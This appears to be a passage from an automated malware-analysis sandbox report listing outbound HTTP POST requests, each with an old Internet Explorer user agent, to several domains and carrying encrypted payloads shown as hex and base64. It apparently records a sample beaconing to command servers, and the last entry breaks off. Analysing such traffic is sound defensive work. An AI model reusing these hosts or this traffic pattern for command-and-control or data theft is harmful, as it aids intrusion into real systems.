4f 73 69 76 2b 69 66 53 42 6f 53 6c 35 38 52 79 44 4f 76 42 73 4b 51 7a 33 66 4a 6f 4b 68 4b 73 41 77 6b 52 58 73 6e 41 66 49 73 45 72 58 52 38 46 75 2f 35 7a 4b 68 66 75 55 76 73 37 36 2f 51 58 4d 34 69 56 55 6b 48 78 48 61 49 4c 35 61 73 5a 77 34 52 58 38 74 74 32 6b 36 55 56 30 4b 73 4c 59 61 69 6e 79 41 32 4a 36 35 4a 6c 72 76 49 5a 65 6e 44 34 62 50 70 7a 53 41 58 61 66 4f 44 6e 56 43 30 54 43 71 32 35 47 55 42 33 54 37 6b 49 50 6e 39 46 44 37 66 77 6f 50 63 4e 38 5a 7a 47 39 6f 4b 7a 75 41 37 50 35 37 58 49 2b 6b 64 67 79 72 76 5a 42 6e 75 36 76 47 6f 42 64 71 32 64 71 6d 38 71 49 37 70 31 65 4f 45 31 6d 2b 2b 7a 54 73 64 5a 48 4c 6a 33 57 78 7a 6b 33 2b 67 61 39 45 56 39 71 57 62 38 79 53 64 45 30 4b 70 78 48 4d 44 4c 34 74 51 4e 47 35 6d 57 75 77 2b 4f 4d 46 52 74 5a 4d 6a 6d 4e 56 44 4e 78 52 51 43 73 54 5a 36 64 50 31 7a 43 35 4a 79 77 54 61 45 4d 4f 76 4d 7a 4b 32 36 4e 68 47 4e 47 71 2b 37 76 65 41 2f 70 35 76 63 78 76 4a 6d 7a 50 37 2b 4f 70 63 47 43 69 50 48 4d 4c 67 79 50 43 35 43 32 48 32 45 33 52 59 69 5a 77 58 75 62 48 4a 71 77 53 61 68 47 47 45 5a 4c 70 49 48 30 44 73 4e 55 63 63 36 61 6d 74 39 57 54 52 4b 62 75 42 65 77 79 69 73 35 32 5a 72 2b 66 69 59 34 4f 46 4a 37 36 39 31 2b 6c 67 68 65 45 55 46 50 6a 47 63 73 71 71 74 66 79 39 66 30 3d Data Ascii: DscVGf/UCcdZivzy3l6zD4hrIbZVjY4ao7RE6jWWll2HuSZCC7roVNZYed1ncMDnJXFXfNJqU4J4I/JVm+mAorwMXnFQe5rcMO3V6oUJuArn8cMfHZS6b3zx/kckQA4adz5eYXatvlyYEQHsF139bOsiv+ifSBoSl58RyDOvBsKQz3fJoKhKsAwkRXsnAfIsErXR8Fu/5zKhfuUvs76/QXM4iVUkHxHaIL5asZw4RX8tt2k6UV0KsLYainyA2J65JlrvIZenD4bPpzSAXafODnVC0TCq25GUB3T7kIPn9FD7fwoPcN8ZzG9oKzuA7P57XI+kdgyrvZBnu6vGoBdq2dqm8qI7p1eOE1m++zTsdZHLj3Wxzk3+ga9EV9qWb8ySdE0KpxHMDL4tQNG5mWuw+OMFRtZMjmNVDNxRQCsTZ6dP1zC5JywTaEMOvMzK26NhGNGq+7veA/p5vcxvJmzP7+OpcGCiPHMLgyPC5C2H2E3RYiZwXubHJqwSahGGEZLpIH0DsNUcc6amt9WTRKbuBewyis52Zr+fiY4OFJ7691+lgheEUFPjGcsqqtfy9f0=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tyrns.comCache-Control: no-cacheData Raw: 4d 7a 6d 44 48 51 6c 4b 45 73 64 51 4e 2b 50 73 57 45 75 39 33 43 4a 48 39 6b 55 6e 41 4f 65 70 54 63 56 6b 50 4a 31 76 61 55 34 47 68 74 45 7a 30 57 59 58 68 48 79 70 63 39 57 38 6f 49 72 70 6a 4a 50 44 6b 78 73 74 42 49 4b 35 66 46 38 77 70 35 65 39 5a 41 7a 6e 73 4e 65 65 38 49 33 37 68 36 76 78 55 43 6b 4f 50 2f 4b 65 50 45 49 44 79 55 75 57 61 39 7a 47 63 75 43 5a 32 56 77 64 51 37 51 78 72 69 4c 6b 4a 2b 79 68 49 51 47 36 43 50 42 63 38 65 7a 31 43 37 69 57 58 35 58 56 30 55 4c 64 50 4f 70 46 41 64 68 38 68 48 50 50 68 77 42 53 73 63 43 32 63 7a 76 45 70 78 47 32 77 5a 57 7a 52 6d 54 58 67 4c 55 67 78 51 46 4b 38 70 69 47 69 2b 6c 6b 50 73 4a 4e 52 4e 61 59 79 6c 32 5a 2f 64 69 59 58 38 49 71 4d 70 43 78 43 66 63 62 42 65 39 31 4c 69 78 35 62 41 4f 78 4c 64 6f 70 5a 31 4f 79 56 70 43 2f 63 46 51 41 48 41 79 42 5a 74 4a 59 63 50 4d 46 63 37 67 49 77 36 50 39 6a 43 73 62 4b 53 4d 4d 6c 70 31 36 31 46 65 6d 6a 6f 6e 6d 57 65 74 6c 32 7a 2b 34 68 59 78 67 72 70 39 39 70 4a 73 62 5a 53 70 76 68 41 42 4c 4a 47 32 34 78 33 75 6a 53 33 38 74 61 5a 76 5a 46 36 5a 76 49 35 41 4c 4a 64 36 41 57 48 42 53 70 65 62 49 6d 67 77 5a 6d 31 44 75 4d 43 33 5a 6f 41 58 56 74 64 6e 45 6e 46 44 44 39 75 57 77 55 4d 52 55 68 36 4b 73 66 73 70 2f 4e 6a 6c 58 68 30 72 70 4c 4c 4d 6f 6c 6b 56 32 59 48 4b 71 6f 67 39 78 45 36 65 47 64 6d 4a 58 76 4e 6f 44 39 2b 55 53 33 58 36 71 33 35 52 4b 77 75 42 51 61 36 38 53 4e 72 49 4f 47 63 46 6f 68 39 37 49 4f 41 31 6a 59 70 31 4a 52 52 48 76 74 58 79 42 57 46 74 70 6e 54 79 38 6c 6a 30 43 67 30 46 6d 46 69 68 6d 6d 30 7a 49 58 5a 6c 6d 34 71 38 59 66 68 74 42 71 73 71 49 62 53 5a 46 46 76 72 6e 63 72 61 77 51 56 4c 66 43 45 79 50 55 50 76 6b 52 36 30 30 66 48 37 52 51 4c 34 3d Data Ascii: MzmDHQlKEsdQN+PsWEu93CJH9kUnAOepTcVkPJ1vaU4GhtEz0WYXhHypc9W8oIrpjJPDkxstBIK5fF8wp5e9ZAznsNee8I37h6vxUCkOP/KePEIDyUuWa9zGcuCZ2VwdQ7QxriLkJ+yhIQG6CPBc8ez1C7iWX5XV0ULdPOpFAdh8hHPPhwBSscC2czvEpxG2wZWzRmTXgLUgxQFK8piGi+lkPsJNRNaYyl2Z/diYX8IqMpCxCfcbBe91Lix5bAOxLdopZ1OyVpC/cFQAHAyBZtJYcPMFc7gIw6P9jCsbKSMMlp161FemjonmWetl2z+4hYxgrp99pJsbZSpvhABLJG24x3ujS38taZvZF6ZvI5ALJd6AWHBSpebImgwZm1DuMC3ZoAXVtdnEnFDD9uWwUMRUh6Ksfsp/NjlXh0rpLLMolkV2YHKqog9xE6eGdmJXvNoD9+US3X6q35RKwuBQa68SNrIOGcFoh97IOA1jYp1JRRHvtXyBWFtpnTy8lj0Cg0FmFihmm0zIXZlm4q8YfhtBqsqIbSZFFvrncrawQVLfCEyPUPvkR600fH7RQL4=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 53 51 59 39 42 72 73 5a 4f 38 65 32 64 52 38 7a 55 73 50 79 61 61 52 62 65 33 6a 42 56 6f 64 42 48 77 63 4e 6c 49 6a 61 42 63 6e 56 64 57 74 41 33 47 32 39 59 34 66 43 50 67 55 6d 33 43 74 68 7a 2f 70 78 79 53 59 64 4d 33 64 66 30 58 47 39 6b 79 47 6d 62 42 6a 4c 48 72 2b 59 35 6f 5a 77 50 43 37 67 4a 52 35 75 6c 46 4e 30 2b 66 45 47 4b 61 55 58 45 47 2f 5a 50 51 76 73 50 50 2b 57 4d 72 70 52 31 7a 73 2f 49 6e 64 68 53 38 79 6a 48 71 6f 51 58 39 6e 4a 49 41 69 4b 2f 42 4b 4b 30 6b 68 4a 66 48 39 71 4c 47 30 56 4b 73 4f 45 72 59 4a 72 57 45 49 38 30 46 4c 4f 58 43 64 37 50 59 6d 48 49 53 63 4b 37 46 55 73 72 50 44 43 51 38 71 51 4e 30 50 73 44 71 78 52 74 51 45 58 53 53 35 67 39 54 6e 55 42 6e 33 41 78 38 77 48 55 4e 6f 38 57 61 30 7a 33 42 4d 31 69 45 44 47 6f 33 6d 58 34 73 7a 63 74 4b 34 73 54 72 72 7a 63 6b 31 6b 46 57 72 37 70 61 46 34 78 48 32 63 7a 67 73 65 73 49 6b 76 30 6b 6b 44 4d 54 6a 45 59 79 38 34 52 38 69 74 73 70 55 65 64 7a 6c 6d 61 38 79 58 33 32 4c 46 49 58 47 74 78 6c 30 62 6a 4d 6c 62 33 30 52 49 58 70 6e 63 73 2f 38 7a 41 42 5a 71 34 49 42 4f 52 4e 46 4b 70 7a 50 36 4c 66 74 63 42 54 6c 55 2b 75 46 51 39 50 70 59 33 66 44 31 4d 2f 71 48 62 79 53 6c 34 6e 6f 47 4c 30 44 44 67 4a 51 2f 41 41 34 35 48 71 58 78 54 6b 6c 63 54 62 65 77 68 61 35 45 63 57 46 32 63 77 73 53 62 36 48 6b 2f 33 41 51 41 35 45 57 30 43 6f 66 41 66 38 37 58 35 30 39 62 70 4c 4c 71 31 37 63 46 4c 38 74 51 46 64 2f 6c 37 63 5a 79 6d 41 56 39 67 30 46 78 52 6a 58 6f 58 63 38 62 38 53 30 58 72 30 67 76 45 78 38 4c 59 6a 6d 54 73 38 6a 4b 42 33 39 69 4a 36 7a 57 54 4a 41 53 67 36 6e 32 4c 45 79 68 41 50 4d 6b 49 47 64 4f 6b 42 30 4d 43 76 71 53 53 79 4a 50 37 43 31 38 59 35 42 52 57 64 39 66 6f 4c 5a Data Ascii: SQY9BrsZO8e2dR8zUsPyaaRbe3jBVodBHwcNlIjaBcnVdWtA3G29Y4fCPgUm3Cthz/pxySYdM3df0XG9kyGmbBjLHr+Y5oZwPC7gJR5ulFN0+fEGKaUXEG/ZPQvsPP+WMrpR1zs/IndhS8yjHqoQX9nJIAiK/BKK0khJfH9qLG0VKsOErYJrWEI80FLOXCd7PYmHIScK7FUsrPDCQ8qQN0PsDqxRtQEXSS5g9TnUBn3Ax8wHUNo8Wa0z3BM1iEDGo3mX4szctK4sTrrzck1kFWr7paF4xH2czgsesIkv0kkDMTjEYy84R8itspUedzlma8yX32LFIXGtxl0bjMlb30RIXpncs/8zABZq4IBORNFKpzP6LftcBTlU+uFQ9PpY3fD1M/qHbySl4noGL0DDgJQ/AA45HqXxTklcTbewha5EcWF2cwsSb6Hk/3AQA5EW0CofAf87X509bpLLq17cFL8tQFd/l7cZymAV9g0FxRjXoXc8b8S0Xr0gvEx8LYjmTs8jKB39iJ6zWTJASg6n2LEyhAPMkIGdOkB0MCvqSSyJP7C18Y5BRWd9foLZ
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.spanesi.comCache-Control: no-cacheData Raw: 6c 68 39 50 65 30 45 33 52 38 66 38 56 2b 77 68 49 4b 64 70 49 42 72 39 5a 6c 71 2f 77 66 48 47 42 65 4c 6b 4d 39 56 63 48 6f 48 36 43 42 49 49 69 2f 78 4c 4b 69 48 78 6c 4e 4f 41 48 6b 71 2b 6a 59 59 68 33 41 34 38 30 49 43 73 31 6b 2f 6a 66 4d 41 54 7a 50 2f 43 6f 6a 79 32 70 74 69 62 52 71 75 6e 41 46 2b 44 49 51 31 6f 46 4c 70 33 48 68 54 64 42 67 71 63 38 64 7a 46 2f 58 6d 73 62 71 43 45 56 55 2b 68 46 62 67 52 33 70 39 71 6c 54 78 61 51 30 77 34 48 5a 31 52 76 42 4b 68 49 75 52 5a 68 4c 4e 6c 4a 75 45 47 6e 72 74 31 73 4c 4e 78 63 74 65 4e 4e 44 49 66 61 37 57 2b 55 51 4d 45 4f 50 45 70 4d 58 47 61 45 4f 4a 30 2f 39 44 6b 57 4e 39 2f 72 45 5a 32 69 6d 4b 63 41 6b 2f 4a 57 48 52 4f 55 49 69 31 79 42 6b 59 62 50 45 2f 34 4d 38 71 41 4d 45 38 54 6e 66 42 6d 47 71 50 5a 47 48 69 62 4f 55 47 69 4f 4f 43 68 59 79 54 71 62 51 33 50 33 63 4c 59 74 2b 7a 61 6b 6c 33 78 45 33 53 32 69 66 59 47 32 45 62 4c 6e 54 38 78 33 45 54 38 6b 79 35 64 61 56 5a 79 57 74 77 5a 5a 36 6f 35 31 54 44 4a 57 30 79 50 32 76 64 53 43 37 77 59 43 65 30 68 79 35 2b 6e 57 46 71 55 68 47 66 54 4e 78 58 33 75 36 57 32 7a 49 69 44 4f 48 43 46 7a 33 64 71 38 5a 45 50 6c 52 73 6e 74 44 66 54 51 54 6e 7a 59 6e 45 6e 32 63 51 6d 6f 43 67 53 34 30 6d 4c 75 35 53 46 79 6a 2f 30 45 54 53 44 5a 43 51 67 69 63 76 74 37 36 2f 64 74 75 69 36 33 72 39 48 58 6f 50 43 4b 46 31 32 63 39 39 2b 66 74 6c 75 75 61 35 79 41 6f 49 71 48 72 7a 64 41 58 73 45 6a 37 51 6e 70 77 48 36 4f 39 73 37 61 34 72 45 57 67 6b 58 4b 51 53 77 6c 48 52 78 42 55 42 4f 67 42 50 59 4d 74 43 67 30 49 54 64 73 57 6f 37 64 6e 54 46 38 55 30 4a 48 4a 77 37 58 4c 56 4e 6e 54 48 63 6a 59 64 6e 4f 42 66 56 49 63 38 51 35 73 54 6e 77 42 38 4d 65 51 54 6e 42 7a 54 42 54 62 68 67 73 66 65 Data Ascii: lh9Pe0E3R8f8V+whIKdpIBr9Zlq/wfHGBeLkM9VcHoH6CBIIi/xLKiHxlNOAHkq+jYYh3A480ICs1k/jfMATzP/Cojy2ptibRqunAF+DIQ1oFLp3HhTdBgqc8dzF/XmsbqCEVU+hFbgR3p9qlTxaQ0w4HZ1RvBKhIuRZhLNlJuEGnrt1sLNxcteNNDIfa7W+UQMEOPEpMXGaEOJ0/9DkWN9/rEZ2imKcAk/JWHROUIi1yBkYbPE/4M8qAME8TnfBmGqPZGHibOUGiOOChYyTqbQ3P3cLYt+zakl3xE3S2ifYG2EbLnT8x3ET8ky5daVZyWtwZZ6o51TDJW0yP2vdSC7wYCe0hy5+nWFqUhGfTNxX3u6W2zIiDOHCFz3dq8ZEPlRsntDfTQTnzYnEn2cQmoCgS40mLu5SFyj/0ETSDZCQgicvt76/dtui63r9HXoPCKF12c99+ftluua5yAoIqHrzdAXsEj7QnpwH6O9s7a4rEWgkXKQSwlHRxBUBOgBPYMtCg0ITdsWo7dnTF8U0JHJw7XLVNnTHcjYdnOBfVIc8Q5sTnwB8MeQTnBzTBTbhgsfe
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tc17.comCache-Control: no-cacheData Raw: 72 62 5a 52 42 6c 31 62 58 4d 65 72 6c 50 58 41 6c 4b 57 62 46 4a 62 6e 64 57 73 4c 72 71 51 57 34 56 6d 75 59 43 6a 55 59 4f 46 70 45 38 44 43 75 72 64 6f 48 6e 52 50 49 57 78 66 76 43 47 6d 62 44 4d 73 30 5a 73 49 4d 64 7a 44 46 65 52 4e 6c 42 77 34 76 67 42 54 54 47 74 6e 59 4e 46 31 4c 4e 69 41 73 50 79 70 2b 44 57 46 48 49 4a 4b 5a 48 53 71 36 56 4d 61 4b 55 2b 4d 57 6c 44 79 41 70 6c 6a 51 64 68 4b 6c 44 6d 45 5a 7a 62 75 31 31 41 34 6d 51 32 62 62 37 73 38 6a 46 4d 6d 32 48 57 4e 44 42 69 62 42 42 6b 68 45 39 39 6d 44 7a 64 50 38 43 55 37 45 43 64 50 56 32 65 36 58 67 4a 5a 50 59 41 76 76 36 56 2b 6a 6c 53 35 54 67 38 2b 37 57 6e 72 69 4d 5a 33 4d 77 54 33 37 4d 7a 36 4f 57 61 74 36 59 65 39 6b 64 4a 2b 33 50 4b 4c 45 39 77 76 49 4e 34 53 78 63 4c 45 55 30 2b 65 76 2f 6c 77 79 34 70 43 35 4a 50 59 6b 4a 62 54 33 4e 62 74 64 73 6a 35 37 31 72 30 31 46 37 39 59 5a 6f 36 7a 64 2f 43 37 63 76 69 49 6e 49 32 32 44 48 34 76 6a 74 62 68 71 4a 6d 31 31 4f 4a 47 2f 38 78 61 6e 71 61 38 42 70 79 46 7a 49 52 57 31 59 77 66 73 72 32 4c 58 57 4b 33 70 4b 38 44 6b 4f 43 59 42 46 6f 2f 48 4e 53 58 78 39 56 4c 5a 68 6b 43 54 4a 2b 5a 79 42 73 30 5a 2b 76 4b 61 45 6c 2f 61 6f 7a 6a 68 38 42 52 44 65 4d 4b 56 6e 42 33 71 6e 4b 43 6f 43 6a 68 6f 38 4d 39 61 57 69 68 6d 71 56 34 37 67 41 62 73 6a 43 4c 43 7a 54 46 6f 4f 38 36 32 72 56 2b 38 47 71 6e 4a 64 6c 4f 4a 50 58 38 31 39 4a 33 34 2f 6f 34 63 62 56 63 44 57 49 45 52 63 55 4f 67 74 52 37 6a 42 48 6b 33 6f 42 71 42 75 6e 66 47 66 4d 70 57 31 5a 71 6b 45 4c 35 44 49 50 74 6f 6f 39 6e 74 44 2b 35 6c 46 57 69 6f 71 6a 6d 67 68 71 33 42 64 6c 70 4e 59 71 43 6e 62 51 42 74 45 62 39 65 50 34 59 31 59 75 30 6b 58 35 33 44 57 77 64 4e 2b 2f 31 63 48 63 73 51 73 67 33 50 2f 47 33 41 3d 3d Data Ascii: rbZRBl1bXMerlPXAlKWbFJbndWsLrqQW4VmuYCjUYOFpE8DCurdoHnRPIWxfvCGmbDMs0ZsIMdzDFeRNlBw4vgBTTGtnYNF1LNiAsPyp+DWFHIJKZHSq6VMaKU+MWlDyApljQdhKlDmEZzbu11A4mQ2bb7s8jFMm2HWNDBibBBkhE99mDzdP8CU7ECdPV2e6XgJZPYAvv6V+jlS5Tg8+7WnriMZ3MwT37Mz6OWat6Ye9kdJ+3PKLE9wvIN4SxcLEU0+ev/lwy4pC5JPYkJbT3Nbtdsj571r01F79YZo6zd/C7cviInI22DH4vjtbhqJm11OJG/8xanqa8BpyFzIRW1Ywfsr2LXWK3pK8DkOCYBFo/HNSXx9VLZhkCTJ+ZyBs0Z+vKaEl/aozjh8BRDeMKVnB3qnKCoCjho8M9aWihmqV47gAbsjCLCzTFoO862rV+8GqnJdlOJPX819J34/o4cbVcDWIERcUOgtR7jBHk3oBqBunfGfMpW1ZqkEL5DIPtoo9ntD+5lFWioqjmghq3BdlpNYqCnbQBtEb9eP4Y1Yu0kX53DWwdN+/1cHcsQsg3P/G3A==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 6e 66 77 78 6c 65 39 44 42 38 6a 70 70 36 6a 4f 44 71 41 31 37 50 6a 6e 7a 55 55 46 76 39 56 47 6b 39 4a 61 43 43 35 70 39 64 4e 39 34 43 41 57 31 4c 70 48 49 37 58 5a 50 68 56 73 76 37 4f 6d 49 56 46 66 6c 32 62 67 6d 37 6b 65 6a 4f 59 54 58 49 79 57 44 39 6d 66 67 78 71 5a 7a 75 47 6a 7a 66 70 47 7a 6c 77 53 33 41 7a 68 46 76 62 53 73 48 32 79 75 4e 41 65 39 76 39 66 41 62 2f 41 55 63 49 44 64 35 77 72 51 4b 54 6b 34 4a 6e 48 67 66 57 34 31 54 78 41 46 69 66 70 42 78 34 43 36 74 44 71 6f 5a 39 56 64 52 61 6b 31 6c 31 2f 2f 48 35 55 41 66 6b 42 41 5a 44 36 34 42 57 70 4e 56 78 48 44 52 6e 6c 6f 30 2b 75 75 4e 64 38 67 46 68 49 6b 4a 4c 39 46 49 61 4c 34 6e 6c 55 72 67 61 65 70 7a 74 48 45 7a 33 44 30 53 53 42 52 78 7a 62 4a 42 50 6f 4d 36 54 50 79 61 52 6d 47 2b 2b 79 67 4d 67 6b 53 73 75 39 49 6e 33 4a 30 33 4c 30 63 73 57 64 46 37 4b 56 73 44 34 52 61 63 66 6a 64 33 7a 57 37 4d 54 66 51 57 51 50 65 2b 54 43 63 72 6b 72 43 71 64 58 72 34 44 55 51 33 57 70 44 38 71 49 54 30 67 33 33 38 77 41 55 6a 6b 4c 66 37 30 72 6c 6b 39 33 42 71 4a 68 2b 51 76 33 44 71 67 6f 73 38 65 6f 2b 6c 78 41 57 42 2b 56 31 33 38 70 38 45 77 48 63 30 54 53 45 6c 70 30 4d 50 68 74 4b 43 37 69 76 67 65 43 7a 79 31 4b 48 6f 68 4c 2b 52 73 6c 6c 65 6e 78 6d 42 74 55 6c 76 66 4b 55 6f 44 7a 4a 71 59 58 7a 56 6e 2b 58 57 6d 4a 7a 75 4a 69 67 42 76 72 78 7a 59 70 52 41 47 75 6a 41 65 6a 65 4f 51 41 4f 77 30 41 66 39 63 58 4e 34 4e 44 44 4b 50 39 35 61 7a 61 58 56 33 6a 72 4a 5a 44 42 6f 67 64 34 65 71 48 2b 6c 42 31 2f 57 2f 2f 61 68 73 6e 49 79 65 39 76 48 56 6a 58 6b 34 48 49 66 34 66 58 52 61 45 64 6d 41 51 74 7a 41 3d Data Ascii: nfwxle9DB8jpp6jODqA17PjnzUUFv9VGk9JaCC5p9dN94CAW1LpHI7XZPhVsv7OmIVFfl2bgm7kejOYTXIyWD9mfgxqZzuGjzfpGzlwS3AzhFvbSsH2yuNAe9v9fAb/AUcIDd5wrQKTk4JnHgfW41TxAFifpBx4C6tDqoZ9VdRak1l1//H5UAfkBAZD64BWpNVxHDRnlo0+uuNd8gFhIkJL9FIaL4nlUrgaepztHEz3D0SSBRxzbJBPoM6TPyaRmG++ygMgkSsu9In3J03L0csWdF7KVsD4Racfjd3zW7MTfQWQPe+TCcrkrCqdXr4DUQ3WpD8qIT0g338wAUjkLf70rlk93BqJh+Qv3Dqgos8eo+lxAWB+V138p8EwHc0TSElp0MPhtKC7ivgeCzy1KHohL+RsllenxmBtUlvfKUoDzJqYXzVn+XWmJzuJigBvrxzYpRAGujAejeOQAOw0Af9cXN4NDDKP95azaXV3jrJZDBogd4eqH+lB1/W//ahsnIye9vHVjXk4HIf4fXRaEdmAQtzA=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 46 57 7a 76 6d 56 68 72 42 38 68 79 56 41 52 38 57 33 59 73 31 55 75 6b 43 57 49 67 69 57 64 4d 44 43 79 68 66 63 59 76 42 48 57 33 4d 65 47 65 6c 4d 62 2b 52 79 67 4b 78 4b 6f 51 6e 45 63 55 79 78 6d 62 6d 61 54 72 6e 51 66 2f 69 54 57 37 73 79 56 61 4c 35 66 71 4e 36 54 68 50 6e 74 77 34 43 43 69 59 32 41 78 4d 39 57 6a 44 76 4c 45 31 54 4e 77 65 73 35 49 4e 45 50 6c 34 65 71 79 44 63 71 73 66 6d 64 4d 7a 65 46 51 48 4a 43 76 5a 2b 4c 62 64 73 54 62 47 34 6c 5a 46 78 6b 6e 61 75 63 4a 39 30 6b 6a 54 52 4e 34 71 65 4f 6a 54 6a 4c 6a 74 67 64 6b 51 4d 6d 36 78 31 71 71 69 4b 64 38 6c 74 65 39 77 35 63 4b 34 6c 67 68 67 2f 76 72 47 4b 57 66 74 37 33 2f 4f 57 72 7a 46 45 71 64 42 65 71 6e 47 79 31 4d 4f 36 2f 4f 4f 59 7a 38 69 71 35 4c 6b 2b 38 73 69 63 4f 2b 72 75 62 47 54 70 51 68 78 35 2b 71 4a 54 76 47 43 57 71 56 6a 41 34 45 62 39 52 42 70 56 4f 72 37 36 79 6f 62 4d 4c 49 2f 73 53 5a 45 69 6e 4a 59 45 57 44 66 6c 68 53 31 74 36 41 78 4a 4b 70 30 56 70 47 77 71 63 35 6c 79 50 75 31 55 75 39 56 65 2f 34 44 51 48 41 78 39 38 39 39 63 34 6d 72 7a 59 37 72 30 6b 6a 43 46 6b 46 76 69 42 51 2b 35 39 4f 49 65 70 79 79 32 6a 48 2f 30 34 2f 6a 57 49 35 41 49 75 41 65 47 70 6c 69 47 37 43 61 68 57 4b 52 6f 53 2b 2f 6e 42 56 72 33 56 52 78 4b 69 48 51 62 2b 63 4a 43 68 39 57 73 56 46 67 43 74 4c 74 57 2f 41 73 77 47 41 5a 4a 46 66 6d 47 2f 32 6e 74 33 57 46 6c 57 55 62 75 62 4a 48 61 4c 4e 37 6c 44 63 66 37 4e 43 5a 6e 53 64 37 61 54 66 75 32 68 49 66 32 56 48 4f 51 58 53 6b 72 57 4b 53 66 50 67 4e 74 78 4c 55 44 47 45 72 39 31 6e 50 56 55 31 57 68 55 4c 37 58 65 57 63 2b 45 4e 73 6e 64 74 53 79 55 3d Data Ascii: FWzvmVhrB8hyVAR8W3Ys1UukCWIgiWdMDCyhfcYvBHW3MeGelMb+RygKxKoQnEcUyxmbmaTrnQf/iTW7syVaL5fqN6ThPntw4CCiY2AxM9WjDvLE1TNwes5INEPl4eqyDcqsfmdMzeFQHJCvZ+LbdsTbG4lZFxknaucJ90kjTRN4qeOjTjLjtgdkQMm6x1qqiKd8lte9w5cK4lghg/vrGKWft73/OWrzFEqdBeqnGy1MO6/OOYz8iq5Lk+8sicO+rubGTpQhx5+qJTvGCWqVjA4Eb9RBpVOr76yobMLI/sSZEinJYEWDflhS1t6AxJKp0VpGwqc5lyPu1Uu9Ve/4DQHAx9899c4mrzY7r0kjCFkFviBQ+59OIepyy2jH/04/jWI5AIuAeGpliG7CahWKRoS+/nBVr3VRxKiHQb+cJCh9WsVFgCtLtW/AswGAZJFfmG/2nt3WFlWUbubJHaLN7lDcf7NCZnSd7aTfu2hIf2VHOQXSkrWKSfPgNtxLUDGEr91nPVU1WhUL7XeWc+ENsndtSyU=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 49 42 59 76 6d 52 64 6c 42 38 69 54 73 4b 37 75 42 6a 39 56 4e 6d 41 72 6a 69 70 4e 32 35 77 55 4f 2f 4a 41 4f 74 56 46 48 7a 41 46 73 2b 35 6d 39 5a 55 6e 59 6e 44 2f 71 5a 30 56 55 71 77 51 65 4c 6f 69 53 59 37 49 38 37 52 65 70 6b 4e 56 77 58 4e 54 36 6b 6f 30 38 41 6b 31 2b 47 44 49 76 4f 45 34 34 30 57 56 7a 4e 5a 52 77 6d 46 31 66 48 38 62 39 51 47 34 36 38 66 53 6c 74 2f 33 57 73 42 75 73 67 5a 6c 76 67 74 6d 2f 53 5a 59 7a 36 56 45 74 70 49 55 57 6d 44 77 70 72 49 33 79 4b 46 70 52 4e 6d 5a 58 59 37 42 2b 2b 52 73 63 53 2f 4e 53 30 33 37 32 74 4a 31 6b 36 48 34 54 39 65 6f 71 6c 5a 31 6a 6d 76 53 6f 4c 36 30 37 36 45 55 5a 41 74 66 77 4c 53 35 58 7a 4a 5a 49 4d 36 72 61 68 43 70 73 57 6c 50 6b 55 64 56 37 78 78 69 70 4b 7a 78 36 4c 76 4d 57 79 70 41 75 7a 65 6a 76 4e 71 4c 53 47 32 4f 56 54 50 79 39 6f 4b 37 74 57 39 39 77 70 33 6d 55 70 76 4a 44 45 61 4f 46 46 77 59 68 4e 66 62 71 76 65 6b 49 54 47 49 6d 31 2f 65 76 50 46 64 48 72 35 73 71 37 61 50 46 30 58 43 45 74 6c 42 55 47 4f 35 74 2f 4a 72 30 58 41 6c 6b 59 63 44 63 42 71 62 76 48 53 30 62 61 38 6c 48 41 37 69 51 36 73 4d 5a 67 6b 44 59 67 49 66 66 76 63 73 63 66 31 4e 69 70 39 57 50 4d 45 58 35 79 6d 41 54 49 6d 69 31 4f 4c 7a 71 67 65 53 42 6b 5a 58 73 69 49 55 68 6c 31 72 4a 68 37 52 69 53 6d 4d 74 43 47 51 61 2b 51 77 2b 6f 30 65 7a 38 56 7a 6a 4f 47 46 32 32 69 30 75 49 75 46 69 5a 36 39 50 66 6c 39 53 36 48 58 4a 70 2b 5a 32 37 38 6e 65 39 36 53 58 6c 4f 51 70 69 30 59 68 55 6e 6f 6c 61 4e 66 63 36 4e 5a 77 6a 72 35 4e 66 38 6a 47 67 39 42 69 56 6f 36 61 6e 78 4a 48 33 54 50 77 44 61 66 47 61 76 49 43 74 30 78 30 69 71 4a 51 74 4b 54 39 49 2b 77 53 47 4f 2b 73 77 3d 3d Data Ascii: 